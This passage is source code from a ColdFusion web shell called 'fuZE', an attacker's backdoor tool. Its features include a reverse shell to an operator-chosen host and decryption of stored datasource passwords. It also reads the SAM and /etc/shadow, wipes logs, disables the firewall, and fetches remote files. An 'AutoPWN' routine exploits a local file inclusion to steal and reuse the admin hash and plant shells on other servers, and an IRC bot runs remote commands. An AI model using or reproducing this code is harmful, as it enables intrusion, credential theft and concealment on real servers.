<cfelseif isDefined(“Form.reverseip”) and isDefined(“Form.reverseport”)>
<pre>Sending shell to #htmleditformat(Form.reverseip)#:#htmleditformat(Form.reverseport)#</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cfscript>
try{

// Create socket
socket=createObject(“java”,”java.net.Socket”);

// Connect to remote host
socket.connect(createObject(“java”,”java.net.InetSocketAddress”).init(Form.reverseip,Form.reverseport));
writeoutput(“Remote port reached: #socket.isConnected()##chr(10)#”);

// Establish connection
try{
instream=createObject(“java”,”java.io.BufferedReader”).init(createObject(“java”,”java.io.InputStreamReader”).init(socket.getInputStream()));
outstream=createObject(“java”,”java.io.PrintWriter”).init(socket.getOutputStream());
writeoutput(“Connection successful!#chr(10)#”);
} catch (IOException e) {
writeoutput(“IO Exception: Read failed#chr(10)#”);
}

// Communicate
outstream.println(“.:: fuZE CF Reverse Shell ::.”);
outstream.print(“> “);
outstream.flush();
while(True){
str = instream.readLine();
cmd = str.split(” “);
if (not str.matches(“exit”)){
p = createObject(“java”,”java.lang.ProcessBuilder”).init(cmd).start();
i = createObject(“java”,”java.io.InputStreamReader”).init(p.getInputStream());
br = createObject(“java”,”java.io.BufferedReader”).init(i);
line=br.readLine();
while (isDefined(“line”)) {
outstream.println(line);
outstream.flush();
line = br.readLine();
}
br.close();
i.close();
outstream.print(“> “);
outstream.flush();
}
else {
outstream.println(“Terminating”);
outstream.close();
instream.close();
socket.close();
}
}

}catch (Exception e) {
writeoutput(“Exception: Error#chr(10)#”);
}
</cfscript>
<cfcatch>Connection terminated</cfcatch>
</cftry>
</textarea>
<cfelseif isDefined(“Form.function”)>
<pre>Function: ‘#htmleditformat(Form.function)#'</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cfswitch expression=”#Form.function#”>
<!— ColdFusion functions —>
<cfcase value=”Dump datasource passwords”>Datasource : Password
<cfscript>
o=createobject(“java”,”coldfusion.server.ServiceFactory”).getDatasourceService().getDatasources();
for(i in o) {
if(len(o[i][“password”])){
dp=Decrypt(o[i][“password”], generate3DesKey(“0yJ!@1$r8p0L@r1$6yJ!@1rj”), “DESede”, “Base64”) ;
writeoutput(“#htmleditformat(i)# : #htmleditformat(dp)##chr(10)#”);
}
}
</cfscript>
</cfcase>
<cfcase value=”Dump CF hashes”><cffile action=”READ” file=”#Server.ColdFusion.RootDir#\lib\password.properties” variable=”cfhashes”>#htmleditformat(cfhashes)#</cfcase>
<cfcase value=”Restart JRUN server (CF)”>
<cfscript>
oJRun = CreateObject(“java”,”jrunx.kernel.JRun”);
oJRun.restart(oJRun.getServerName());
</cfscript>
</cfcase>
<cfcase value=”Wipe ColdFusion logs”>
<cfset sf = CreateObject(“java”, “coldfusion.server.ServiceFactory”)>
<cfset logDir = sf.LoggingService.getLogDirectory()>
<cfif server.os.name neq “UNIX”>
<cfset osSlash = “\”>
<cfelse>
<cfset osSlash = “/”>
</cfif>
<cfdirectory action=”list” directory=”#logDir#” name=”logs” filter=”*.log”>
<cfloop query=”logs”>
<cffile action=”write” file=”#logDir##osSlash##logs.Name#” output=”## Purged” addnewline=”yes”>
</cfloop>
</cfcase>
<!— Windows functions —>
<cfcase value=”Disable Windows firewall”><cfexecute name=”cmd.exe” arguments=”/c netsh firewall set opmode disable” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Enable Telnet service”><cfexecute name=”cmd.exe” arguments=”/c sc config tlntsvr start= demand & net start telnet” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Show opened ports [W]”><cfexecute name=”cmd.exe” arguments=”/c netstat -aon” timeout=”15″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Read SAM”><cfexecute name=”cmd.exe” arguments=”/c type %WINDIR%\repair\SAM” timeout=”15″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Read SECURITY”><cfexecute name=”cmd.exe” arguments=”/c type %WINDIR%\repair\SECURITY” timeout=”15″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Read SYSTEM”><cfexecute name=”cmd.exe” arguments=”/c type %WINDIR%\repair\SYSTEM” timeout=”15″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Read IIS paths”>Path : Domain : LogFileDirectory
<cftry>
<cfset xmlPath=arrayNew(1)>
<cfset xmllocation=arraynew(1)>
<cfset xmlServerindings=arraynew(1)>
<cfset xmlLogFileDirectory=arraynew(1)>
<cfset Xmlbasepath=”C:\WINDOWS\system32\inetsrv\MetaBase.xml”>
<cftry>
<cffile action=”read” file=”#Xmlbasepath#” variable=”XMLFileText”>
<cfcatch type=”any”>
<cfoutput>Error reading MetaBase.xml: #cfcatch.type#</cfoutput>
<cfreturn xmlpath>
</cfcatch></cftry>
<cfset myXMLDocument=XmlParse(XMLFileText)>
<cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebServer)>
<cfloop index=”i” from = “1” to = #numItems#>
<cfif findnocase(“ServerBindings=”,#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
<cfset ServerBindings = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.ServerBindings#>
<cfset location = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.location#>
<cfset arrayAppend(xmllocation,(“#location#”))>
<cfset arrayAppend(xmlServerindings,(“#ServerBindings#”))>
<cfif findnocase(“LogFileDirectory=”,#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
<cfset LogFileDirectory = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.LogFileDirectory#>
<cfset arrayAppend(xmlLogFileDirectory,(“#LogFileDirectory#”))>
<cfelse>
<cfset arrayAppend(xmlLogFileDirectory,(“”))>
</cfif></cfif></cfloop>
<cfset numLocations=arraylen(xmllocation)>
<cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebVirtualDir)>
<cfloop index=”i” from = “1” to = #numItems#>
<cfif findnocase(“path”,#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i]#) >
<cfset path1 = #myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.path#>
<cfif findnocase(“Program Files”,#path1#) is 0 and findnocase(“WINDOWS”,#path1#) is 0>
<cfset listpath=arraytolist(xmlpath)>
<cfif find(#path1#,#listpath#) is 0>
<cfset arrayAppend(xmlpath,”#path1#”)>
<cfloop index=”j” from = “1” to = #numLocations#>
<cfif findnocase(#xmllocation[j]#,#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.Location#) is not 0>
<cfoutput>”#path1#” : “#xmlServerindings[j]#” : “#xmlLogFileDirectory[j]#”#chr(10)#</cfoutput>
</cfif></cfloop></cfif></cfif></cfif></cfloop>
<cfcatch>Error
</cfcatch>
</cftry>
</cfcase>
<cfcase value=”View open sessions [W]”><cfexecute name=”cmd.exe” arguments=”/c query session” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View local shares”><cfexecute name=”cmd.exe” arguments=”/c net share” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View domain shares”><cfexecute name=”cmd.exe” arguments=”/c net view” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View users”><cfexecute name=”cmd.exe” arguments=”/c net user” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View running processes [W]”><cfexecute name=”cmd.exe” arguments=”/c tasklist” timeout=”15″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View system info [W]”><cfexecute name=”cmd.exe” arguments=”/c systeminfo” timeout=”30″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Check disk for consistency”><cfexecute name=”cmd.exe” arguments=”/c chkdsk” timeout=”180″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase> <!— Shout outs to fractal! —>
<!— Linux functions —>
<cfcase value=”Find SUID files”><cfexecute name=”sh” arguments=”-c ‘find / -type f -perm -04000 -ls'” timeout=”60″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Find SGID files”><cfexecute name=”sh” arguments=”-c ‘find / -type f -perm -02000 -ls'” timeout=”60″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Find all *conf* files”><cfexecute name=”sh” arguments=”-c ‘find / -type f -name *conf*'” timeout=”60″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Find all .*_history files”><cfexecute name=”sh” arguments=”-c ‘find / -type f -name .*_history'” timeout=”60″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Find all *.pwd files”><cfexecute name=”sh” arguments=”-c ‘find / -type f -name *.pwd'” timeout=”60″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Find all .*rc files”><cfexecute name=”sh” arguments=”-c ‘find / -type f -name .*rc'” timeout=”60″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Find all writable directories and files”><cfexecute name=”sh” arguments=”-c ‘find / -perm -2 -ls'” timeout=”60″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Find all writable directories and files in current dir”><cfexecute name=”sh” arguments=”-c ‘find . -perm -2 -ls'” timeout=”60″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Read /etc/passwd”><cfexecute name=”sh” arguments=”-c ‘cat /etc/passwd'” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Read /etc/shadow”><cfexecute name=”sh” arguments=”-c ‘cat /etc/shadow'” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Read /proc/self/environ”><cfexecute name=”sh” arguments=”-c ‘cat /proc/self/environ'” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”Show opened ports [L]”><cfexecute name=”sh” arguments=”-c ‘netstat -a'” timeout=”15″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View open sessions [L]”><cfexecute name=”sh” arguments=”-c ‘w'” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View recent sessions”><cfexecute name=”sh” arguments=”-c ‘last'” timeout=”15″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View running processes [L]”><cfexecute name=”sh” arguments=”-c ‘ps auxww'” timeout=”15″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View memory info”><cfexecute name=”sh” arguments=”-c ‘df -h;free -m'” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View CPU info”><cfexecute name=”sh” arguments=”-c ‘cat /proc/cpuinfo'” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfcase value=”View system info [L]”><cfexecute name=”sh” arguments=”-c ‘uname -a'” timeout=”10″ variable=”cmdout”></cfexecute>#htmleditformat(cmdout)#</cfcase>
<cfdefaultcase>Invalid function</cfdefaultcase>
</cfswitch>
<cfcatch>Error
</cfcatch>
</cftry>
</textarea>
<cfelseif isDefined(“Form.decrypt_hash”)>
<pre>Decrypting ‘#htmleditformat(Form.decrypt_hash)#'</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cfscript>
dp=Decrypt(Form.decrypt_hash, generate3DesKey(“0yJ!@1$r8p0L@r1$6yJ!@1rj”), “DESede”, “Base64”);
writeoutput(dp);
</cfscript>
<cfcatch>Invalid hash
</cfcatch>
</cftry>
</textarea>
<cfelseif isDefined(“Form.Upload”) and Form.Upload EQ “Upload”>
<pre>Uploading file to ‘#htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))#'</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cffile action=”upload” destination=”#getDirectoryFromPath(getCurrentTemplatePath())#” filefield=”Form.File” nameconflict=”overwrite”>File uploaded!
<cfcatch>Upload failed
</cfcatch>
</cftry>
</textarea>
<cfelseif isdefined(“Form.Download”)>
<cftry>
<cfsilent>
<cfheader name=”Content-Disposition” value=”attachment; filename=#getFileFromPath(Form.Download)#”>
<cfcontent type=”application/unknown” file=”#Form.Download#”>
</cfsilent>
<cfcatch>File is not available
<cfabort>
</cfcatch>
</cftry>
<cfelseif isDefined(“Form.RUpload”)>
<pre>Uploading file from ‘#htmleditformat(Form.RUpload)#'</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cfhttp url=”#Form.RUpload#” method=”get” getasbinary=”yes” result=”rFile” />
<cffile action=”write” file=”#getDirectoryFromPath(getCurrentTemplatePath())##listLast(Form.RUpload,”\/”)#” addNewLine=”no” output=”#rFile.filecontent#” />
<cfoutput>File saved to #htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))##htmleditformat(listLast(Form.RUpload,”\/”))#</cfoutput>
<cfcatch>Error</cfcatch>
</cftry>
</textarea>
<cfelseif isDefined(“Form.exec_sql”)>
<pre><cfoutput>Executing ‘#htmleditformat(Form.exec_sql)#’ in datasource ‘#htmleditformat(Form.datasource)#'</cfoutput></pre>
<cfquery name=”sqlout” datasource=”#Form.datasource#” username=”#Form.db_username#” password=”#Form.db_password#”>
#Form.exec_sql#
</cfquery>
<cfdump var=”#sqlout#” expand=”false”>
<cfelseif isDefined(“Form.cfscan”)>
<pre>Scanning for CF instances over the LAN</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cfset sf = CreateObject(“java”, “coldfusion.server.ServiceFactory”)>
<cfset lic=#sf.LicenseService.runScan()#>
<cfloop collection=”#lic#” item=”i”>
<cfoutput>ColdFusion #lic[i][1][‘Edition’]# build #lic[i][1][‘Build’]# at #lic[i][1][‘MachineName’]# (#lic[i][1][‘IpAddrs’]#)#chr(10)#</cfoutput>
</cfloop>
<cfcatch>Error<cfif isDefined(“cfcatch.message”)>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
</cftry>
</textarea>
<cfelseif isDefined(“Form.regpath”)>
<cftry>
<cfif form.regpath is not “”>
<cfif form.entry is “”>
<CFREGISTRY Action=”getAll”
Branch=”#form.regpath#”
Type=”Any”
Name=”RegQuery”>
<CFTABLE Query=”RegQuery” colHeaders HTMLTable Border=”Yes”>
<CFCOL Header=”<B>Entry</b>” Width=”35″ Text=”#RegQuery.Entry#”>
<CFCOL Header=”<B>Type</b>” Width=”10″ Text=”#RegQuery.type#”>
<CFCOL Header=”<B>Value</b>” Width=”35″ Text=”#RegQuery.Value#”>
</CFTABLE>
<cfelse>
<cfif form.newentry is “”>
<CFPARAM NAME=”RegValue” DEFAULT=”not found”>
<CFREGISTRY Action = “get” Branch = “#form.regpath#” Entry = “#form.Entry#” Type=”#form.regtype#” variable = “RegValue”>
<cfoutput>(#form.regpath#\#form.Entry# ) values is : #RegValue#</cfoutput>
<cfelse>
<CFPARAM NAME=”RegValue” DEFAULT=”not found”>
<CFREGISTRY Action = “get” Branch = “#form.regpath#” Entry = “#form.Entry#” Variable = “RegValue” Type = “#form.regtype#”>
<cfoutput>(#form.regpath#\#form.Entry# ) old values is : #RegValue#<br /></cfoutput>
<cfif regvalue is not “not found”>
<CFREGISTRY Action=”set” Branch=”#form.regpath#” Entry=”#form.Entry#” Type=”#form.regtype#” Value=”#form.newEntry#”>
<cfoutput>(#form.regpath#\#form.Entry# ) new values is : #form.newEntry#</cfoutput>
</cfif>
</cfif>
</cfif>
<cfelse>Error: A registry path must be defined
</cfif>
<cfcatch type=”any”><cfoutput>Error: #cfcatch.type#</cfoutput></cfcatch>
</cftry>
<cfelseif isDefined(“Form.target_host”)>
<pre>Attempting to AutoPWN [#htmleditformat(Form.target_host)#]</pre>
<cftry>
<cfset target_host=Form.target_host>
<textarea class=”report” rows=”20″>
====================================================================================================
[~] AutoPWN report for [<cfoutput>#HTMLEditFormat(target_host)#</cfoutput>]
<cfset lfi=[
<!— Single server configuration ColdFusion —>
“..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties”,
<!— ColdFusion 7 —>
“..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties”,
<!— ColdFusion 8 —>
“..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties”,
<!— ColdFusion 6, 7 AND 8 —>
“..\..\..\..\..\..\..\..\..\..\JRUN4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties”
]>
<cfset lfi_success=FALSE>
<cfloop array=”#lfi#” index=”i”>
<cfhttp url=”http://#target_host#/CFIDE/administrator/logging/settings.cfm?locale=#i#%00en” result=”lfiresult” method=”get”></cfhttp>
<cfset cfadmin_hash=REReplace(REReplace(REReplace(lfiresult.Filecontent,”(.*?)password=”,””,”ALL”),”#chr(10)#encrypted(.*?)</html>”,””,”ALL”),”\s”,””,”ALL”)>
<cfif Len(cfadmin_hash) GT 0 AND Len(cfadmin_hash) LTE 40 AND cfadmin_hash NEQ “ConnectionFailure”>
<cfset lfi_success=TRUE>
<cfbreak>
</cfif>
</cfloop>
<cfif lfi_success EQ TRUE>[!] LFI succeeded, hash acquired: <cfoutput>#HTMLEditFormat(cfadmin_hash)#</cfoutput>
<cfelse><cfthrow message=”LFI failed”>
</cfif>
<cfhttp url=”http://#target_host#/CFIDE/administrator/enter.cfm” result=”adminpage” method=”get”>
<cfset cfadmin_salt=REReplace(Mid(adminpage.Filecontent,13,REFind(“[0-9]{13}”,adminpage.Filecontent)), “(.*?)salt”” type=””hidden”” value=”””,””,”ALL”)>
<cfswitch expression=”#Len(cfadmin_hash)#”>
<cfcase value=”40″>
<cfset secretKeySpec=createObject(“java”,”javax.crypto.spec.SecretKeySpec”).init(toBinary(toBase64(cfadmin_salt)),”HmacSHA1″)>
<cfset mac=createObject(“java”,”javax.crypto.Mac”).getInstance(“HmacSHA1″)>
<cfset mac.init(secretKeySpec)>
<cfset encryptedBytes=mac.doFinal(toBinary(toBase64(cfadmin_hash)))>
<cfset cfadmin_password=BinaryEncode(mac.doFinal(toBinary(toBase64(cfadmin_hash))),”Hex”)>
</cfcase>
<cfdefaultcase>
<!— TODO: CF6 Auth —>
<cfthrow message=”CF6 authentication is unsupported”>
</cfdefaultcase>
</cfswitch>
[*] Logging in
<cfset responsecookies=adminpage.Responseheader[“Set-Cookie”]>
<cfset cookiearray=ArrayNew(1)>
<cfloop item=”i” collection=”#responsecookies#”>
<cfset cookiearray[i]=ListGetAt(responsecookies[i],1,”;”)>
</cfloop>
<cfhttp url=”http://#target_host#/CFIDE/administrator/enter.cfm” result=”adminlogin” method=”post” redirect=”false”>
<cfhttpparam type=”header” name=”Cookie” value=”#ArraytoList(cookiearray,’; ‘)#”>
<cfhttpparam type=”formfield” name=”cfadminUserId” value=”admin”>
<cfhttpparam type=”formfield” name=”cfadminPassword” value=”#cfadmin_password#”>
<cfhttpparam type=”formfield” name=”salt” value=”#cfadmin_salt#”>
</cfhttp>
<cfset authorizationcookies=adminlogin.Responseheader[“Set-Cookie”]>
<cfset admincookiearray=ArrayNew(1)>
<cfloop item=”i” collection=”#authorizationcookies#”>
<cfset admincookiearray[i]=ListGetAt(authorizationcookies[i],1,”;”)>
</cfloop>
<cfset authkey=admincookiearray[4]>
<cfhttp url=”http://#target_host#/CFIDE/administrator/reports/index.cfm” result=”settingssummary” method=”get”>
<cfhttpparam type=”header” name=”Cookie” value=”#authkey#”>
</cfhttp>
<cfset runtime_user=REReplace(REReplace(REReplace(settingssummary.Filecontent,”(.*?)User Name(.*?)#chr(9)##chr(9)##chr(9)##chr(9)#”,””,”ONE”),” &nbsp;(.*?)</html>”,””,”ONE”),”\s”,””,”ALL”)>
<cfset cfide_path=REReplace(REReplace(REReplace(settingssummary.Filecontent,”(.*?)#chr(9)#/CFIDE (.*?)#chr(9)##chr(9)##chr(9)##chr(9)#”,””,”ONE”),” &nbsp;(.*?)</html>”,””,”ONE”),”\s”,””,”ALL”)>
<cfif REFind(“/”,cfide_path)><cfset slash=”/”>
<cfelse><cfset slash=”\”>
</cfif>[*] Creating payload objects
<cfset shell_name=listFirst(listLast(getCurrentTemplatePath(),”\/”),”.”)>
<cffile action=”Copy” source=”#getCurrentTemplatePath()#” destination=”#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt”>
<cfset shell_url=”http://#cgi.local_addr##reverse(listRest(reverse(CGI.SCRIPT_NAME),”/”))#/#shell_name#.txt”>
<cfhttp url=”http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm” result=”scheduletask” method=”post”>
<cfhttpparam type=”header” name=”Cookie” value=”#authkey#”>
<cfhttpparam type=”formfield” name=”TaskName” value=”CFSh”>
<cfhttpparam type=”formfield” name=”Start_Date” value=”1/3/37″>
<cfhttpparam type=”formfield” name=”ScheduleType” value=”Once”>
<cfhttpparam type=”formfield” name=”StartTimeOnce” value=”12:00 AM”>
<cfhttpparam type=”formfield” name=”Interval” value=”Daily”>
<cfhttpparam type=”formfield” name=”customInterval_hour” value=”0″>
<cfhttpparam type=”formfield” name=”customInterval_min” value=”0″>
<cfhttpparam type=”formfield” name=”customInterval_sec” value=”0″>
<cfhttpparam type=”formfield” name=”Operation” value=”HTTPRequest”>
<cfhttpparam type=”formfield” name=”ScheduledURL” value=”#shell_url#”>
<cfhttpparam type=”formfield” name=”publish” value=”1″>
<cfhttpparam type=”formfield” name=”publish_file” value=”#cfide_path##slash##shell_name#.cfm”>
<cfhttpparam type=”formfield” name=”adminsubmit” value=”Submit”>
<cfhttpparam type=”formfield” name=”taskNameOrig” value=””> <!— CF8- —>
</cfhttp>
<cfhttp url=”http://#target_host#/CFIDE/#shell_name#.cfm” result=”shell_status” method=”get”>
<cfif find(“&fnof;uZE Shell”,shell_status.Filecontent) is not 0>[!] &fnof;uZE copied successfully
<cfelse>[!] Shell not found, recreating payload to subvert firewall
<cfhttp url=”http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm” result=”scheduletask” method=”post”>
<cfhttpparam type=”header” name=”Cookie” value=”#authkey#”>
<cfhttpparam type=”formfield” name=”TaskName” value=”CFSh”>
<cfhttpparam type=”formfield” name=”Start_Date” value=”1/3/37″>
<cfhttpparam type=”formfield” name=”ScheduleType” value=”Once”>
<cfhttpparam type=”formfield” name=”StartTimeOnce” value=”12:00 AM”>
<cfhttpparam type=”formfield” name=”Interval” value=”Daily”>
<cfhttpparam type=”formfield” name=”customInterval_hour” value=”0″>
<cfhttpparam type=”formfield” name=”customInterval_min” value=”0″>
<cfhttpparam type=”formfield” name=”customInterval_sec” value=”0″>
<cfhttpparam type=”formfield” name=”Operation” value=”HTTPRequest”>
<cfhttpparam type=”formfield” name=”ScheduledURL” value=”/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E”>
<cfhttpparam type=”formfield” name=”publish” value=”1″>
<cfhttpparam type=”formfield” name=”publish_file” value=”#cfide_path##slash#microshell.cfm”>
<cfhttpparam type=”formfield” name=”adminsubmit” value=”Submit”>
<cfhttpparam type=”formfield” name=”taskNameOrig” value=”CFSh”> <!— CF8- —>
</cfhttp>
<cfhttp url=”http://#target_host#/CFIDE/microshell.cfm” result=”shell_status_2″ method=”get”>
<cfif find(“&##181;SH”,shell_status_2.Filecontent) is not 0>[!] Firewall subversion was successful
<cfelse>[!] Shell not found
</cfif>
</cfif>[*] Removing payload objects
<cfhttp url=”http://#target_host#/CFIDE/administrator/scheduler/scheduletasks.cfm?action=delete&task=CFSh” result=”deletetask” method=”get”>
<cfhttpparam type=”header” name=”Cookie” value=”#authkey#”>
<cffile action=”Delete” file=”#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt”>
</cfhttp>[~] Results:
[*] Server Status: <cfif find(“&fnof;uZE Shell”,shell_status.Filecontent) NEQ 0 OR find(“&##181;SH”,shell_status_2.Filecontent) NEQ 0>Compromised<cfelse>Uncompromised</cfif>
[*] Access obtained: <cfoutput>#HTMLEditFormat(runtime_user)#</cfoutput>
[*] Shell location: <cfif find(“&fnof;uZE Shell”,shell_status.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat(“http://#target_host#/CFIDE/#shell_name#.cfm”)#</cfoutput><cfelseif find(“&##181;SH”,shell_status_2.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat(“http://#target_host#/CFIDE/microshell.cfm”)#</cfoutput><cfelse>N/A</cfif>
[~] EOF
====================================================================================================</textarea>
<cfcatch>[!] Error<cfif isDefined(“cfcatch.message”)>: <cfoutput>#cfcatch.message#</cfoutput></cfif>
[~] Results:
[*] Server Status: N/A
[*] Access obtained: N/A
[*] Shell location: N/A
[~] EOF
====================================================================================================</textarea>
</cfcatch>
</cftry>
<cfelseif isDefined(“Form.nuke”)>
<pre>Nuking shell</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cffile action=”delete” file=”#getCurrentTemplatePath()#”>
Shell nuked
<cfcatch>Error</cfcatch>
</cftry>
</textarea>
<cfelseif isDefined(“Form.ircip”) and isDefined(“Form.ircport”)>
<pre>Connecting to #htmleditformat(Form.ircip)#:#htmleditformat(Form.ircport)#</pre>
<textarea class=”report” rows=”20″>
<cftry>
<cfscript>
try{

// Create socket
socket=createObject(“java”,”java.net.Socket”);

// Connect to remote host
socket.connect(createObject(“java”,”java.net.InetSocketAddress”).init(Form.ircip,Form.ircport));
writeoutput(“Remote port reached: #socket.isConnected()##chr(10)#”);

// Establish connection
try{
instream=createObject(“java”,”java.io.BufferedReader”).init(createObject(“java”,”java.io.InputStreamReader”).init(socket.getInputStream()));
outstream=createObject(“java”,”java.io.PrintWriter”).init(socket.getOutputStream());
writeoutput(“Connection successful!#chr(10)#”);
} catch (IOException e) {
writeoutput(“IO Exception: Read failed#chr(10)#”);
}

// Communicate
outstream.println(“NICK #Form.ircnick#”);
outstream.println(“USER #Form.ircuname# 8 * :#Form.ircrname#”);
outstream.flush();
while(True){
str = instream.readLine();
cmd = str.split(” “);

//———————CLIENT———————-//
if (not cmd[1] EQ “PING”){
if (cmd[2] EQ “433”){
writeoutput(“Nickname already in use: #Form.ircnick##chr(10)#”);
Form.ircnick=”#Form.ircnick#_”;
outstream.println(“NICK #Form.ircnick#”);
outstream.flush();
}
else if (cmd[2] EQ “004”){
writeoutput(“Entered IRC#chr(10)#”);
outstream.println(“JOIN #Form.ircchan#”);
outstream.flush();
}
else if (FindNoCase(“:>”,str)){
command_init=str.split(“:>”);
command=command_init[2].split(” “);
switch(command[1]){
//———————//
// Commands
//———————//
// Raw
case “raw”:
{
raw_init=str.split(“:>raw “);
raw=raw_init[2];
outstream.println(“#raw#”);
outstream.flush();
break;
}
//———————//
// Decrypt
case “decrypt”:
{
decrypt_init=str.split(“:>decrypt “);
decrypt_hash=decrypt_init[2];
channel=cmd[3];
outstream.println(“PRIVMSG #channel# :Decrypting ‘#chr(15)##decrypt_hash##chr(15)#'”);
outstream.flush();
dp=Decrypt(decrypt_hash, generate3DesKey(“0yJ!@1$r8p0L@r1$6yJ!@1rj”), “DESede”, “Base64″);
dp=replace(dp,chr(2),”\x02″,”ALL”); // Escape IRC bold character
dp=replace(dp,chr(3),”\x03″,”ALL”); // Escape IRC color character
dp=replace(dp,chr(7),”\x07″,”ALL”); // Escape IRC beep character
dp=replace(dp,chr(10),”\x0A”,”ALL”); // Escape LF
dp=replace(dp,chr(13),”\x0D”,”ALL”); // Escape CR
dp=replace(dp,chr(15),”\x0f”,”ALL”); // Escape IRC no format character
dp=replace(dp,chr(16),”\x16″,”ALL”); // Escape IRC reverse character
dp=replace(dp,chr(31),”\x1f”,”ALL”); // Escape IRC underline character
outstream.println(“PRIVMSG #channel# :’#dp#'”);
outstream.flush();
break;
}
//———————//
// Execute
case “exec”:
{
exec_init=str.split(“:>exec “);
exec=exec_init[2].split(” “);
channel=cmd[3];
outstream.println(“PRIVMSG #channel# :Executing ‘#chr(15)##exec_init[2]##chr(15)#'”);
outstream.flush();
p = createObject(“java”,”java.lang.ProcessBuilder”).init(exec).start();
i = createObject(“java”,”java.io.InputStreamReader”).init(p.getInputStream());
br = createObject(“java”,”java.io.BufferedReader”).init(i);
line=br.readLine();
while (isDefined(“line”)) {
outstream.println(“PRIVMSG #channel# :> #line#”);
outstream.flush();
line = br.readLine();
}
br.close();
i.close();
break;
}
//———————//
// Help
case “help”:
{
channel=cmd[3];
outstream.println(“PRIVMSG #channel# :fuZE CF IRC Datapipe | Developed by XiX”);
outstream.println(“PRIVMSG #channel# :Commands: >raw >decrypt >exec >help >exit”);
outstream.flush();
break;
}
//———————//
// Exit
case “exit”:
{
outstream.close();
